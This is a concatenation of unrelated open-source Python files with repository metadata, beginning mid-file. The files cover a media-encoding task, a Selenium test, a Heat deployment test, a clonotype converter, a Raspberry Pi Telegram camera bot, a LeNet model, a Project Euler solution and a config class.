logger.debug("Loading encoder: {0} ({1})".format(profile.encoder,
fqn(encoder)))
logger.debug("Encoder command: {0}".format(encoder.command))
logger.info("Encoder input file: {0}".format(
short_path(encoder.input_path)))
logger.info("Start encoding ({0}) - output file: {1}".format(
profile.mime_type,
short_path(encoder.output_path)),
# additional information for sentry
extra={
'encoder_profile': profile,
'encoder_name': profile.encoder,
'encoder_command': encoder.command,
'encoder_output': encoder.output_path
})
# start encoding
try:
encoder.start()
except EncodeError as error:
error_msg = "Encoding Media failed: {0}".format(
encoder.input_path)
logger.error(error_msg, exc_info=True, extra={
'output': error.output,
'command': error.command
})
raise
logger.debug("Completed encoding ({0}) - output file: {1}".format(
profile.mime_type, short_path(encoder.output_path)))
return {
"id": media_id,
"profile": profile
}
class StoreMedia(Task):
"""
Upload an instance :py:class:`~encode.models.MediaBase` model's
``output_files`` m2m field.
"""
#: If enabled the worker will not store task state and return values
#: for this task.
ignore_result = True
def run(self, data):
"""
Execute the task.
:param data:
:type data: dict
"""
media_id = data.get('id')
profile = data.get('profile')
base = media_base(media_id)
media = base.get_media()
logger.debug("Uploading encoded file: {0}".format(
short_path(media.output_path(profile))))
try:
# store the media object
media.store_file(profile)
except (UploadError, Exception) as exc:
# XXX: handle exception: SSLError('The read operation timed out',)
logger.error("Upload media failed: '{0}' - retrying ({1})".format(
media, exc), exc_info=True)
raise
logger.info("Upload complete: {0}".format(
short_path(media.output_path(profile))), extra={
'output_files': [x.file.url for x in media.output_files.all()],
})
# remove the original input file
if media.keep_input_file is False:
media.remove_file(profile)
| mit | -7,000,919,595,200,251,000 | 29.215686 | 78 | 0.574951 | false |
hugobarzano/NoInventory | Selenium/test_item_1.py | 1 | 3045 | # -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest, time, re
class ItemTest1(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.driver.implicitly_wait(30)
self.base_url = "http://noinventory.cloudapp.net"
self.verificationErrors = []
self.accept_next_alert = True
def test_item_test1(self):
driver = self.driver
driver.get(self.base_url + "/items")
driver.find_element_by_xpath("(//button[@type='button'])[2]").click()
driver.find_element_by_id("id_nombre_item").clear()
driver.find_element_by_id("id_nombre_item").send_keys("prueba selenium")
driver.find_element_by_id("id_descripcion_item").clear()
driver.find_element_by_id("id_descripcion_item").send_keys("descripcion del objeto con el que vamos a realizar las pruebas unitarias")
Select(driver.find_element_by_id("id_tag1")).select_by_visible_text("Facultad de Ciencias")
Select(driver.find_element_by_id("id_tag2")).select_by_visible_text("ORDENADOR CPU TORRE")
Select(driver.find_element_by_id("id_tag3")).select_by_visible_text("POR REVISAR")
driver.find_element_by_id("id_peso").clear()
driver.find_element_by_id("id_peso").send_keys("3.3")
driver.find_element_by_id("id_unidades").clear()
driver.find_element_by_id("id_unidades").send_keys("6")
Select(driver.find_element_by_id("id_tag1")).select_by_visible_text(u"Facultad de Psicología")
driver.find_element_by_name("submit").click()
driver.find_element_by_id("texto").clear()
driver.find_element_by_id("texto").send_keys("prueba seleni")
driver.find_element_by_id("busqueda").click()
driver.find_element_by_xpath("(//button[@type='button'])[3]").click()
self.assertRegexpMatches(self.close_alert_and_get_its_text(), r"^¿Estas seguro que deseas borrar los Items[\s\S]$")
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
except NoSuchElementException as e: return False
return True
def is_alert_present(self):
try: self.driver.switch_to_alert()
except NoAlertPresentException as e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally: self.accept_next_alert = True
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
| gpl-3.0 | 6,154,920,643,843,559,000 | 44.41791 | 142 | 0.654946 | false |
BeenzSyed/tempest | tempest/api/orchestration/stacks/test_rackconnect.py | 1 | 5346 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.orchestration import base_multipleusers
from tempest.common.utils.data_utils import rand_name
from tempest.openstack.common import log as logging
from datetime import datetime
import requests
import yaml
import time
import os
import pdb
LOG = logging.getLogger(__name__)
class StacksTestJSON(base_multipleusers.BaseMultipleOrchestrationTest):
_interface = 'json'
empty_template = "HeatTemplateFormatVersion: '2013-05-23'\n"
@classmethod
def setUpClass(cls):
super(StacksTestJSON, cls).setUpClass()
def test_rackconnect_realDeployment(self):
self._test_stack_for_RackConnect("kitchen_sink")
def _send_deploy_time_graphite(self, region, template, deploy_time, buildfail):
cmd = 'echo "heat.qa.build-tests.' + region + '.' + template \
+ '.' + buildfail + ' ' + str(deploy_time) \
+ ' `date +%s`" | ' \
'nc http://graphite.staging.rs-heat.com/ ' \
'2003 -q 2'
print cmd
os.system(cmd)
print "Deploy time sent to graphite"
def _test_stack_for_RackConnect(self, template):
user_rackconnect = self.managers[2]
region = self.config.orchestration['regions']
template_giturl = "https://raw.githubusercontent.com/heat-ci/heat-templates/master/prod/kitchen_sink.template"
response_templates = requests.get(template_giturl, timeout=3)
yaml_template = yaml.safe_load(response_templates.content)
stack_name = rand_name("sabeen"+template)
parameters = {}
if 'key_name' in yaml_template['parameters']:
parameters['key_name'] = 'sabeen'
if 'domain_name' in yaml_template['parameters']:
parameters['domain_name'] = "example%s.com" %datetime.now().microsecond
if 'git_url' in yaml_template['parameters']:
parameters['git_url'] = "https://github.com/timductive/phphelloworld"
print "\nDeploying %s in %s" % (template, region)
stack_identifier = self.create_stack(user_rackconnect, stack_name, region,
yaml_template, parameters)
#stack_identifier = self.create_stack(stack_name, region,
# yaml_template, parameters)
print stack_identifier
stack_id = stack_identifier.split('/')[1]
count = 0
resp, body = self.get_stack(user_rackconnect, stack_id, region)
print "Stack %s status is: %s, %s" % (stack_name, body['stack_status'], body['stack_status_reason'])
while body['stack_status'] == 'CREATE_IN_PROGRESS' and count < 90:
resp, body = self.get_stack(user_rackconnect,stack_id, region)
if resp['status'] != '200':
print "The response is: %s" % resp
self.fail(resp)
print "Deployment in %s status. Checking again in 1 minute" % body['stack_status']
time.sleep(60)
count += 1
if body['stack_status'] == 'CREATE_FAILED':
print "Stack create failed. Here's why: %s" % body['stack_status_reason']
print "Deleting the stack now"
resp, body = self.delete_stack(user_rackconnect,
stack_name, stack_id, region)
if resp['status'] != '204':
print "Delete did not work"
self._send_deploy_time_graphite(region, template, count, "failtime")
self.fail("Stack create failed")
if count == 90:
print "Stack create has taken over 90 minutes. Force failing now."
self._send_deploy_time_graphite(region, template, count, "failtime")
resp, body = self.delete_stack(stack_name, stack_id, region)
if resp['status'] != '204':
print "Delete did not work"
self.fail("Stack create took too long")
if body['stack_status'] == 'CREATE_COMPLETE':
print "The deployment took %s minutes" % count
self._send_deploy_time_graphite(region, template, count, "buildtime")
#extract region and name of template
#delete stack
print "Deleting stack now"
resp, body = self.delete_stack(user_rackconnect, stack_name,
stack_id, region)
if resp['status'] != '204':
print "Delete did not work"
else:
print "Something went wrong! This could be the reason: %s" % body['stack_status_reason'] | apache-2.0 | 2,207,363,008,343,079,700 | 45.903509 | 118 | 0.587542 | false |
shengqh/ngsperl | lib/scRNA/clonotype_cell.py | 1 | 2601 | import argparse
import logging
import os
import sys
import re
import json
def initialize_logger(logfile, args):
logger = logging.getLogger('clonotype_cell')
loglevel = logging.INFO
logger.setLevel(loglevel)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)-8s - %(message)s')
# create console handler and set level to info
handler = logging.StreamHandler()
handler.setLevel(loglevel)
handler.setFormatter(formatter)
logger.addHandler(handler)
# create error file handler and set level to error
handler = logging.FileHandler(logfile, "w")
handler.setLevel(loglevel)
handler.setFormatter(formatter)
logger.addHandler(handler)
return(logger)
def getValidFilename(s):
s = str(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def runCommand(command, logger):
logger.info("run : " + command )
os.system(command)
def check_file(filename, parser):
if not os. path. isfile(filename):
print("error: file not exists: " + filename)
parser.print_help()
sys.exit(1)
def convert(json_file, output_file, logger):
logger.info("reading %s" % json_file)
with open(output_file, "wt") as fout:
fout.write("barcode\tclonetype\n")
barcodes = set()
with open(json_file, "rt") as fin:
data = json.load(fin)
for record in data:
if record["is_cell"]:
if not record['barcode'] in barcodes:
fout.write("%s\t%s\n" % (record['barcode'], record['info']['raw_clonotype_id']))
barcodes.add(record['barcode'])
logger.info("written to %s" % output_file)
def main():
parser = argparse.ArgumentParser(description="Extract cell of clonotype",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
DEBUG = True
NOT_DEBUG = not DEBUG
parser.add_argument('-i', '--input', action='store', nargs='?', help="Input clone type json file", required=NOT_DEBUG)
parser.add_argument('-o', '--output', action='store', nargs='?', help="Output clone type cell file")
if not DEBUG and len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if DEBUG:
args.input="/data/h_vangard_1/alexander_gelbard_data/AG_3669_10X_cellranger4/VDJ/3669-AG-6/all_contig_annotations.json"
args.output="/data/h_vangard_1/alexander_gelbard_data/AG_3669_10X_cellranger4/VDJ/3669-AG-6/all_contig_annotations.json.txt"
check_file(args.input, parser)
logger = initialize_logger(args.output + ".log", args)
convert(args.input, args.output, logger)
if __name__ == "__main__":
main()
| apache-2.0 | 192,097,637,951,968,420 | 30.337349 | 128 | 0.666282 | false |
scaidermern/piCamBot | piCamBot.py | 1 | 23669 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# dependencies:
# - https://github.com/python-telegram-bot/python-telegram-bot
# - https://github.com/dsoprea/PyInotify
#
# similar project:
# - https://github.com/FutureSharks/rpi-security/blob/master/bin/rpi-security.py
#
# - todo:
# - configurable log file path
# - check return code of raspistill
#
import importlib
import inotify.adapters
import json
import logging
import logging.handlers
import os
import queue
import shlex
import shutil
import signal
import subprocess
import sys
import threading
import time
from telegram.error import NetworkError, Unauthorized
from telegram.ext import Updater, MessageHandler, Filters
class piCamBot:
def __init__(self):
# config from config file
self.config = None
# logging stuff
self.logger = None
# check for motion and send captured images to owners?
self.isArmed = False
# telegram bot updater
self.updater = None
# perform movement detection via PIR?
self.hasPIR = False
# perform movement detection via motion software?
self.useMotion = False
# GPIO module, dynamically loaded depending on config
self.GPIO = None
# are we currently shutting down?
self.isShuttingDown = False
# buzzer enabled?
self.hasBuzzer = False
# queue of sequences to play via buzzer
self.buzzerQueue = None
# turn on LED(s) during image capture?
self.hasCaptureLED = False
# GPIO output for capture LED(s)
self.captureLEDgpio = None
# state of capture LED (on/off)
self.isCaptureLEDOn = False
def run(self):
try:
self.runInternal()
finally:
self.cleanup()
def runInternal(self):
# setup logging, we want to log both to stdout and a file
logFormat = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
self.logger = logging.getLogger(__name__)
fileHandler = logging.handlers.TimedRotatingFileHandler(filename='picam.log', when='midnight', backupCount=7)
fileHandler.setFormatter(logFormat)
self.logger.addHandler(fileHandler)
stdoutHandler = logging.StreamHandler(sys.stdout)
stdoutHandler.setFormatter(logFormat)
self.logger.addHandler(stdoutHandler)
self.logger.setLevel(logging.INFO)
self.logger.info('Starting')
# register signal handler
signal.signal(signal.SIGHUP, self.signalHandler)
signal.signal(signal.SIGINT, self.signalHandler)
signal.signal(signal.SIGQUIT, self.signalHandler)
signal.signal(signal.SIGTERM, self.signalHandler)
try:
self.config = json.load(open('config.json', 'r'))
except:
self.logger.exception('Could not parse config file:')
sys.exit(1)
self.hasPIR = self.config['pir']['enable']
self.useMotion = self.config['motion']['enable']
self.hasBuzzer = self.config['buzzer']['enable']
self.hasCaptureLED = self.config['capture']['led']['enable']
# check for conflicting config options
if self.hasPIR and self.useMotion:
self.logger.error('Enabling both PIR and motion based capturing is not supported')
sys.exit(1)
# check if we need GPIO support
if self.hasBuzzer or self.hasPIR or self.hasCaptureLED:
self.GPIO = importlib.import_module('RPi.GPIO')
self.GPIO.setmode(self.GPIO.BCM)
if self.hasCaptureLED:
self.captureLEDgpio = self.config['capture']['led']['gpio']
self.GPIO.setup(self.captureLEDgpio, self.GPIO.OUT)
# set default state
self.isArmed = self.config['general']['arm']
self.updater = Updater(self.config['telegram']['token'])
dispatcher = self.updater.dispatcher
bot = self.updater.bot
# check if API access works. try again on network errors,
# might happen after boot while the network is still being set up
self.logger.info('Waiting for network and Telegram API to become accessible...')
telegramAccess = False
timeout = self.config['general']['startup_timeout']
timeout = timeout if timeout > 0 else sys.maxsize
for i in range(timeout):
try:
self.logger.info(bot.get_me())
self.logger.info('Telegram API access working!')
telegramAccess = True
break # success
except NetworkError as e:
pass # don't log network errors, just ignore
except Unauthorized as e:
# probably wrong access token
self.logger.exception('Error while trying to access Telegram API, wrong Telegram access token?')
raise
except:
# unknown exception, log and then bail out
self.logger.exception('Error while trying to access Telegram API:')
raise
time.sleep(1)
if not telegramAccess:
self.logger.error('Could not access Telegram API within time, shutting down')
sys.exit(1)
# pretend to be nice to our owners
ownerIDs = self.config['telegram']['owner_ids']
for ownerID in ownerIDs:
try:
bot.sendMessage(chat_id=ownerID, text='Hello there, I\'m back!')
except:
# most likely network problem or user has blocked the bot
self.logger.exception('Could not send hello to user %s:' % ownerID)
threads = []
# set up watch thread for captured images
image_watch_thread = threading.Thread(target=self.watchImageDir, name="Image watch")
image_watch_thread.daemon = True
image_watch_thread.start()
threads.append(image_watch_thread)
# set up PIR thread
if self.hasPIR:
pir_thread = threading.Thread(target=self.watchPIR, name="PIR")
pir_thread.daemon = True
pir_thread.start()
threads.append(pir_thread)
# set up buzzer thread
if self.hasBuzzer:
buzzer_thread = threading.Thread(target=self.watchBuzzerQueue, name="buzzer")
buzzer_thread.daemon = True
buzzer_thread.start()
threads.append(buzzer_thread)
# register message handler and start polling
# note: we don't register each command individually because then we
# wouldn't be able to check the ownerID, instead we register for text
# messages
dispatcher.add_handler(MessageHandler(Filters.text, self.performCommand))
self.updater.start_polling()
while True:
time.sleep(1)
# check if all threads are still alive
for thread in threads:
if thread.isAlive():
continue
# something went wrong, bailing out
msg = 'Thread "%s" died, terminating now.' % thread.name
self.logger.error(msg)
for ownerID in ownerIDs:
try:
bot.sendMessage(chat_id=ownerID, text=msg)
except:
self.logger.exception('Exception while trying to notify owners:')
pass
sys.exit(1)
def performCommand(self, update, context):
message = update.message
if message is None:
return
# skip messages from non-owner
if message.from_user.id not in self.config['telegram']['owner_ids']:
self.logger.warning('Received message from unknown user "%s": "%s"' % (message.from_user, message.text))
message.reply_text("I'm sorry, Dave. I'm afraid I can't do that.")
return
self.logger.info('Received message from user "%s": "%s"' % (message.from_user, message.text))
cmd = update.message.text.lower().rstrip()
if cmd == '/start':
self.commandHelp(update)
elif cmd == '/arm':
self.commandArm(update)
elif cmd == '/disarm':
self.commandDisarm(update)
elif cmd == '/kill':
self.commandKill(update)
elif cmd == '/status':
self.commandStatus(update)
elif cmd == '/capture':
# if motion software is running we have to stop and restart it for capturing images
stopStart = self.isMotionRunning()
if stopStart:
self.commandDisarm(update)
self.commandCapture(update)
if stopStart:
self.commandArm(update)
elif cmd == '/ledtoggle':
self.commandLEDToggle(update)
elif cmd == '/ledstatus':
self.commandLEDStatus(update)
elif cmd == '/buzzer':
self.commandBuzzer(update)
elif cmd == '/help':
self.commandHelp(update)
else:
message.reply_text('Unknown command.')
self.logger.warning('Unknown command: "%s"' % update.message.text)
def commandArm(self, update):
message = update.message
if self.isArmed:
message.reply_text('Motion-based capturing already enabled! Nothing to do.')
return
if not self.hasPIR and not self.useMotion:
message.reply_text('Error: Cannot enable motion-based capturing since neither PIR nor motion is enabled!')
return
message.reply_text('Enabling motion-based capturing...')
if self.hasBuzzer:
sequence = self.config['buzzer']['seq_arm']
if len(sequence) > 0:
self.buzzerQueue.put(sequence)
self.isArmed = True
if not self.useMotion:
# we are done, PIR-mode needs no further steps
return
# start motion software if not already running
if self.isMotionRunning():
message.reply_text('Motion software already running.')
return
motionCmd = shlex.split(self.config['motion']['cmd'])
try:
subprocess.call(motionCmd)
except:
self.logger.exception('Failed to start motion software:')
message.reply_text('Error: Failed to start motion software. See log for details.')
return
# wait until motion is running to prevent
# multiple start and wrong status reports
for i in range(10):
if self.isMotionRunning():
message.reply_text('Motion software now running.')
return
time.sleep(1)
message.reply_text('Motion software still not running. Please check status later.')
def commandDisarm(self, update):
message = update.message
if not self.isArmed:
message.reply_text('Motion-based capturing not enabled! Nothing to do.')
return
message.reply_text('Disabling motion-based capturing...')
if self.hasBuzzer:
sequence = self.config['buzzer']['seq_disarm']
if len(sequence) > 0:
self.buzzerQueue.put(sequence)
self.isArmed = False
if not self.useMotion:
# we are done, PIR-mode needs no further steps
return
pid = self.getMotionPID()
if pid is None:
message.reply_text('No PID file found. Assuming motion software not running. If in doubt use "kill".')
return
if not os.path.exists('/proc/%s' % pid):
message.reply_text('PID found but no corresponding proc entry. Removing PID file.')
os.remove(self.config['motion']['pid_file'])
return
try:
os.kill(pid, signal.SIGTERM)
except OSError:
# ingore if already gone
pass
# wait for process to terminate, can take some time
for i in range(10):
if not os.path.exists('/proc/%s' % pid):
message.reply_text('Motion software has been stopped.')
return
time.sleep(1)
message.reply_text("Could not terminate process. Trying to kill it...")
try:
os.kill(pid, signal.SIGKILL)
except OSError:
# ignore if already gone
pass
# wait for process to terminate, can take some time
for i in range(10):
if not os.path.exists('/proc/%s' % pid):
message.reply_text('Motion software has been stopped.')
return
time.sleep(1)
message.reply_text('Error: Unable to stop motion software.')
def commandKill(self, update):
message = update.message
if not self.useMotion:
message.reply_text('Error: kill command only supported when motion is enabled')
return
killCmd = shlex.split('killall -9 %s' % self.config['motion']['kill_name'])
try:
subprocess.call(killCmd)
except:
self.logger.exception('Failed to send kill signal:')
message.reply_text('Error: Failed to send kill signal. See log for details.')
return
message.reply_text('Kill signal has been sent.')
def commandStatus(self, update):
message = update.message
if not self.isArmed:
message.reply_text('Motion-based capturing not enabled.')
return
image_dir = self.config['general']['image_dir']
if not os.path.exists(image_dir):
message.reply_text('Error: Motion-based capturing enabled but image dir not available!')
return
if self.useMotion:
# check if motion software is running or died unexpectedly
if not self.isMotionRunning():
message.reply_text('Error: Motion-based capturing enabled but motion software not running!')
return
message.reply_text('Motion-based capturing enabled and motion software running.')
else:
message.reply_text('Motion-based capturing enabled.')
def commandCapture(self, update):
message = update.message
message.reply_text('Capture in progress, please wait...')
# enable capture LED(s)
if self.hasCaptureLED:
self.setCaptureLED(True)
# enqueue buzzer sequence
if self.hasBuzzer:
sequence = self.config['buzzer']['seq_capture']
if len(sequence) > 0:
self.buzzerQueue.put(sequence)
capture_file = self.config['capture']['file']
if os.path.exists(capture_file):
os.remove(capture_file)
captureCmd = shlex.split(self.config['capture']['cmd'])
try:
subprocess.call(captureCmd)
except:
self.logger.exception('Capture failed:')
message.reply_text('Error: Capture failed. See log for details.')
return
finally:
# always disable capture LEDs
self.setCaptureLED(False)
if not os.path.exists(capture_file):
message.reply_text('Error: Capture file not found: "%s"' % capture_file)
return
message.reply_photo(photo=open(capture_file, 'rb'))
if self.config['general']['delete_images']:
os.remove(capture_file)
def commandHelp(self, update):
message = update.message
message.reply_text(
'/arm - Enable motion-based capturing.\n'
'/disarm - Disable motion-based capturing.\n'
'/capture - Take a single shot.\n'
'/status - Show current mode.\n'
'/kill - Kill motion software, if enabled.\n'
'/ledtoggle - Toggle capture LED, if configured.\n'
'/ledstatus - Show state of capture LED (on/off), if configured.\n'
'/buzzer - Trigger buzzer, if configured.\n'
'/help - Show this help.')
def commandLEDToggle(self, update):
message = update.message
if self.hasCaptureLED == False:
message.reply_text('No capture LED configured.')
return
self.setCaptureLED(not self.isCaptureLEDOn)
# report state back
self.commandLEDStatus(update)
def commandLEDStatus(self, update):
message = update.message
if self.hasCaptureLED == False:
message.reply_text('No capture LED configured.')
return
message.reply_text('Capture LED is %s.' % ('on' if self.isCaptureLEDOn else 'off'))
def commandBuzzer(self, update):
message = update.message
if self.hasBuzzer == False:
message.reply_text('No buzzer configured.')
return
sequence = self.config['buzzer']['seq_buzzer']
if len(sequence) > 0:
self.buzzerQueue.put(sequence)
def watchImageDir(self):
self.logger.info('Setting up image watch thread')
# set up image directory watch
watchDir = self.config['general']['image_dir']
# purge (remove and re-create) if we allowed to do so
if self.config['general']['delete_images']:
shutil.rmtree(watchDir, ignore_errors=True)
if not os.path.exists(watchDir):
os.makedirs(watchDir) # racy but we don't care
notify = inotify.adapters.Inotify()
notify.add_watch(watchDir)
# only watch for created and renamed files
matchedTypes = ['IN_CLOSE_WRITE', 'IN_MOVED_TO']
ownerIDs = self.config['telegram']['owner_ids']
deleteImages = self.config['general']['delete_images']
bot = self.updater.dispatcher.bot
# check for new events
# (runs forever but we could bail out: check for event being None
# which always indicates the last event)
for event in notify.event_gen():
if event is None:
continue
(header, typeNames, watch_path, filename) = event
if not any(type in typeNames for type in matchedTypes):
continue
filepath = ('%s/%s' % (watch_path, filename))
if not filename.endswith('.jpg'):
self.logger.info('New non-image file: "%s" - ignored' % filepath)
continue
self.logger.info('New image file: "%s"' % filepath)
if self.isArmed:
for ownerID in ownerIDs:
try:
bot.sendPhoto(chat_id=ownerID, caption=filepath, photo=open(filepath, 'rb'))
except:
# most likely network problem or user has blocked the bot
self.logger.exception('Could not send image to user %s: %s' % ownerID)
# always delete image, even if reporting is disabled
if deleteImages:
os.remove(filepath)
def getMotionPID(self):
pid_file = self.config['motion']['pid_file']
if not os.path.exists(pid_file):
return None
with open(pid_file, 'r') as f:
pid = f.read().rstrip()
return int(pid)
def isMotionRunning(self):
pid = self.getMotionPID()
return os.path.exists('/proc/%s' % pid)
def watchPIR(self):
self.logger.info('Setting up PIR watch thread')
sequence = None
if self.hasBuzzer:
sequence = self.config['buzzer']['seq_motion']
if len(sequence) == 0:
sequence = None
captureCmd = shlex.split(self.config['pir']['capture_cmd'])
gpio = self.config['pir']['gpio']
self.GPIO.setup(gpio, self.GPIO.IN)
while True:
if not self.isArmed:
# motion detection currently disabled
time.sleep(0.1)
continue
pir = self.GPIO.input(gpio)
if pir == 0:
# no motion detected
time.sleep(0.1)
continue
self.logger.info('PIR: motion detected')
if sequence:
self.buzzerQueue.put(sequence)
# enable capture LED(s)
if self.hasCaptureLED:
self.setCaptureLED(True)
try:
subprocess.call(captureCmd)
except:
self.logger.exception('Error: Capture failed:')
message.reply_text('Error: Capture failed. See log for details.')
finally:
# always disable capture LEDs
self.setCaptureLED(False)
def watchBuzzerQueue(self):
self.logger.info('Setting up buzzer thread')
gpio = self.config['buzzer']['gpio']
self.GPIO.setup(gpio, self.GPIO.OUT)
duration = self.config['buzzer']['duration']
self.buzzerQueue = queue.SimpleQueue()
# play arm sequence if we are armed right on startup
if self.isArmed:
sequence = self.config['buzzer']['seq_arm']
if len(sequence) > 0:
self.buzzerQueue.put(sequence)
while True:
# wait for queued items and play them
sequence = self.buzzerQueue.get(block=True, timeout=None)
self.playSequence(sequence, duration, gpio)
def playSequence(self, sequence, duration, gpio):
for i in sequence:
if i == '1':
self.GPIO.output(gpio, 1)
elif i == '0':
self.GPIO.output(gpio, 0)
else:
self.logger.warning('Unknown pattern in sequence: %s', i)
time.sleep(duration)
self.GPIO.output(gpio, 0)
def setCaptureLED(self, on):
if not self.hasCaptureLED:
self.logger.error('No capture LED configured')
return
self.GPIO.output(self.captureLEDgpio, 1 if on else 0)
self.isCaptureLEDOn = True if on else False
def cleanup(self):
if self.hasBuzzer:
try:
self.logger.info('Disabling buzzer')
gpio = self.config['buzzer']['gpio']
self.GPIO.output(gpio, 0)
except:
pass
if self.hasCaptureLED:
try:
self.logger.info('Disabling capture LED(s)')
self.setCaptureLED(False)
except:
pass
if self.GPIO is not None:
try:
self.logger.info('Cleaning up GPIO')
self.GPIO.cleanup()
except:
pass
if self.updater is not None and self.updater.running:
try:
self.logger.info('Stopping telegram updater')
self.updater.stop()
except:
pass
self.logger.info('Cleanup done')
def signalHandler(self, signal, frame):
# prevent multiple calls by different signals (e.g. SIGHUP, then SIGTERM)
if self.isShuttingDown:
return
self.isShuttingDown = True
msg = 'Caught signal %d, terminating now.' % signal
self.logger.error(msg)
# try to inform owners
if self.updater and self.updater.running:
try:
bot = self.updater.dispatcher.bot
for ownerID in self.config['telegram']['owner_ids']:
try:
bot.sendMessage(chat_id=ownerID, text=msg)
except:
pass
except:
pass
sys.exit(1)
if __name__ == '__main__':
bot = piCamBot()
bot.run()
| gpl-3.0 | 3,404,977,873,792,638,500 | 34.699849 | 118 | 0.576154 | false |
SunskyF/EasyPR-python | models/easypr/net/lenet.py | 1 | 1738 | from .layer import *
class Lenet:
def __init__(self):
self.num_classes = 65
self.x = None
self.y = None
self.keep_prob = None
self.pred_logits = None
self.pred_labels = None
self.accuracy = None
self.l2_loss = None
self.weights = []
self.biases = []
def compile(self):
self.keep_prob = tf.placeholder(tf.float32)
self.weights = []
self.biases = []
input = ImageLayer(20, 20, 1, layer_name='LENET_IMAGE')
label = LabelLayer()
convpools1 = ConvPoolLayer(input, 5, 5, 16, 2, 2, layer_name='LENET_1')
convpools2 = ConvPoolLayer(convpools1, 5, 5, 32, 2, 2, layer_name='LENET_2')
dp = DropoutLayer(convpools2, self.keep_prob, layer_name='LENET_DP')
flatten = FlattenLayer(dp, layer_name='LENET_FLATTEN')
ip1 = DenseLayer(flatten, 256, layer_name="LENET_DENSE1")
self.weights += ip1.weights
self.biases += ip1.biases
ip1_relu = ActivationLayer(ip1, layer_name='LENET_ACT')
pred = OutputLayer(ip1_relu, self.num_classes, layer_name='LENET_OUTPUT')
self.weights += pred.weights
self.biases += pred.biases
self.x = input.output
self.y = label.output
self.pred_logits = pred.output
self.pred_labels = tf.argmax(self.pred_logits, 1)
correct_pred = tf.equal(self.pred_labels, self.y)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
for w in self.weights + self.biases:
l2_loss = tf.nn.l2_loss(w)
if self.l2_loss is None:
self.l2_loss = l2_loss
else:
self.l2_loss += l2_loss
| apache-2.0 | 3,350,835,448,973,280,000 | 27.491803 | 84 | 0.571922 | false |
tdsymonds/project-euler | scripts/problem50.py | 1 | 2019 | # https://projecteuler.net/problem=50
import math
def get_prime_list(n):
"""
Returns a list of primes < n
Function taken from:
http://stackoverflow.com/questions/2068372/fastest-way-to-list-all-primes-below-n/3035188#3035188
"""
sieve = [True] * n
for i in xrange(3,int(n**0.5)+1,2):
if sieve[i]:
sieve[i*i::2*i]=[False]*((n-i*i-1)/(2*i)+1)
return [2] + [i for i in xrange(3,n,2) if sieve[i]]
def is_prime(number, prime_list):
"""
Returns true if prime. Divides number by all primes in
the list up to the square root of the number.
"""
sqrt = math.sqrt(number)
i = 0
prime = prime_list[i]
while prime <= sqrt:
if number % prime == 0:
return False
i += 1
prime = prime_list[i]
return True
# first get a big list of primes
full_prime_list = get_prime_list(100000)
# set max number
max_number = 1000000
# reset variables
max_length = 0
max_prime = 0
# loop through each prime to start the consecutive primes list from
for index, starting_prime in enumerate(full_prime_list):
# initialise prime list
prime_list = [starting_prime]
# loop through each consecutive prime
for prime in full_prime_list[index+1:]:
# add the prime to the list
prime_list.append(prime)
# calculate the sum and length
prime_list_sum = sum(prime_list)
prime_list_length = len(prime_list)
# if the sum is greater than the max then
# no point continuing
if prime_list_sum >= max_number:
break
# if the sum is prime and greater then the max length
if prime_list_length > 1 and is_prime(prime_list_sum, full_prime_list) and prime_list_length > max_length:
# update max length and the max prime found
max_length = prime_list_length
max_prime = prime_list_sum
# print result
print max_prime | mit | 5,817,782,502,286,328,000 | 26.871429 | 114 | 0.594849 | false |
bluepeppers/dectest | dectest/config.py | 1 | 9920 | """
The configurations system for dectest. Offers two different methods of
configuration; as a python file or from a dict. Each method is implemented in a
different class, but they all provide the same interface.
"""
import imp
import re
DEFAULTS = {
'testing': {
'testasrun': True,
'sideaffects': [],
'runtests': True,
'pretest': None,
'posttest': None,
}
}
class DummyLogger():
"""
A dummy logger to allow quite degregation.
"""
def __getattr__(self, _):
"""
Return a callable that does nothing at all.
"""
return lambda *args, **kwargs: None
class ConfigInterface():
"""
An interface that all classes implementing config methods should inherit.
Methods that implementing classes must provide the following
methods/properties. More information on the required behaviour of each
attribute can be found in their individual documentation in this class.
* store
* reload() (optional)
"""
_logger = DummyLogger()
@property
def store(self):
"""
This property must be implemented by all classes implementing the config
interface. It should be a mapping of section names to a mapping of
item names to values.
If that dosn't make sense, this may help:
>>> conf = DefaultConfig()
>>> conf.store
{'section': {'item1': True, 'item2': 3, 'item4': "foo"}}
"""
raise NotImplementedError()
def reload(self):
"""
This method can be implemented by implementing classes, though it is
optional. When called it should reload the config from it's source.
"""
return
def get(self, section_name, item_name):
"""
Returns the config value in the given section with the given name.
If the value does not exist, then we look in the DEFAULTS global, and
if we can't find it there, we raise a warning, and return None.
"""
values = self.store
if section_name not in values:
if section_name not in DEFAULTS:
# Then we have a program error
self._logger.warning(
"Config section " + section_name +
" does not exist in config or as default")
return
section = DEFAULTS[section_name]
else:
section = values[section_name]
if item_name not in section:
if item_name not in DEFAULTS[section_name]:
self._logger.warning(
"Config value {0}.{1}".format(
section_name, item_name) +
" does not exist in config or as a default")
return
return DEFAULTS[section_name][item_name]
return section[item_name]
